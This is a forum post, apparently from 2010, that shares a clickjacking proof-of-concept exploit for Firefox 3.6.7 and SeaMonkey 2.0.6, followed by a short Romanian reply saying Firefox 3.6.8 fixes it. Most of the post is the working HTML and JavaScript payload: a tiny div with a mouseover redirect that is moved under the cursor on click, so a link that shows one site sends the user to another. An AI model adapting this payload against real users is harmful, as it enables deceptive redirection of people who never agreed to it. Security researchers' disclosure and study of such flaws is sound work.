Firefox version 3.6.7 / SeaMonkey version 2.0.6 clickjacking proof of concept exploit

begood · July 24, 2010


<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>FF3.6.7/SM 2.0.6 ClickJacking Vulnerability</title>
</head><body>

<div id="mydiv" onmouseover="document.location='http://www.mozilla.org';" style="border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 2px; height: 2px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></div>
<script>
function clickjack_armor(evt)
{
    clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX;
    clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY;
    document.getElementById('mydiv').style.left=clickjack_mouseX-1;
    document.getElementById('mydiv').style.top=clickjack_mouseY-1;
}
</script>
<center>
<br>
<center><h1><font face="Calibri">Firefox 3.6.7 / SeaMonkey 2.0.6 Clickjacking Vulnerability</font></h1>
 <p> </p>
<div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px">
    <b><br><br>

    <a href="http://www.Securitylab.ir" onclick="clickjack_armor(event)"> Go
    to the http://www.Securitylab.ir : (http://www.mozilla.org)</a></b></div>
<div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 1px">
 <p> </div>
<p> </p>
</center>
<div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px">
    <b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div>

</center></body></html>

razv · July 24, 2010

au scos azi ff 3.6.8 - cred ca rezolva problema

Sign In

Firefox version 3.6.7 / SeaMonkey version 2.0.6 clickjacking proof of concept exploit

Recommended Posts

begood

razv

Join the conversation

Browse

Activity

Pages